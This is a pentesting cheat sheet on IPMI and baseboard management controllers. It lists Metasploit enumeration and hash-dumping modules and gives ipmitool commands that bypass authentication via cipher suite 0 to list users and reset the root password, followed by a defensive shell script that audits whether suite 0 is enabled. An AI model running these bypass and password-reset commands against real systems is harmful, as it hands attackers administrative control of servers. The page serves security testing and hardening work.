623/UDP - IPMI

Basic Information

Baseboard management controllers (BMCs) are embedded computers that provide out-of-band monitoring for desktops and servers. BMC products are sold under many brand names, including HP iLO, Dell DRAC, and Sun ILOM.

Default Port: UDP/623

Enumeration

msf > use auxiliary/scanner/ipmi/ipmi_version
msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
msf > use auxiliary/scanner/ipmi/ipmi_cipher_zero

Using ipmitool, bypassing authentication with cipher suite 0 (-C 0), to change the root password to abc123:

root@kali:~# apt-get install ipmitool
root@kali:~# ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list
ID  Name             Callin  Link Auth  IPMI Msg   Channel Priv Limit
2   root             true    true       true       ADMINISTRATOR
3   Oper1            true    true       true       ADMINISTRATOR
root@kali:~# ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123
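
To check your own BMCs for the cipher suite 0 exposure used above, this added example (not part of the original page) parses `ipmitool lan print` output and reports whether suite 0 is usable and at what privilege. The sample output is constructed, and reading the first `Cipher Suite Priv Max` character as suite 0 is an assumption based on ipmitool's `cipher_privs` format.

```shell
#!/bin/sh
# Added example: audit `ipmitool lan print` output for cipher suite 0.
# Assumption: "Cipher Suite Priv Max" holds one character per cipher suite,
# starting at suite 0, where X = unused and c/u/o/a/O = max privilege level.

# Reads lan-print text on stdin. Prints "disabled", "enabled:<PRIV>" or
# "unknown". Exit status: 0 = disabled, 1 = enabled, 2 = field not found.
cipher0_status() {
    awk -F: '
        BEGIN {
            name["c"] = "CALLBACK"; name["u"] = "USER"; name["o"] = "OPERATOR"
            name["a"] = "ADMIN";    name["O"] = "OEM"
        }
        /^Cipher Suite Priv Max/ {
            gsub(/[ \t\r]/, "", $2)      # strip padding around the value
            priv = substr($2, 1, 1)      # first character = cipher suite 0
            found = 1
        }
        END {
            if (!found || priv == "") { print "unknown";  exit 2 }
            if (priv == "X")          { print "disabled"; exit 0 }
            print "enabled:" ((priv in name) ? name[priv] : priv)
            exit 1
        }'
}

# Constructed sample outputs (not captured from a real BMC).
SAMPLE_WEAK='Auth Type Enable        : Callback : MD5
RMCP+ Cipher Suites     : 0,1,2,3
Cipher Suite Priv Max   : aaaaXXXXXXXXXXX'

SAMPLE_HARDENED='RMCP+ Cipher Suites     : 0,1,2,3
Cipher Suite Priv Max   : XXXaXXXXXXXXXXX'

# Demo run over both samples; "|| :" keeps a non-zero status from aborting.
for sample in "$SAMPLE_WEAK" "$SAMPLE_HARDENED"; do
    printf '%s\n' "$sample" | cipher0_status || :
done
```

On a host with in-band access to the BMC, `ipmitool lan print 1 | cipher0_status` runs the check (channel 1 is an assumption). Setting the first character to `X` with `ipmitool lan set <channel> cipher_privs <privlist>` disables suite 0.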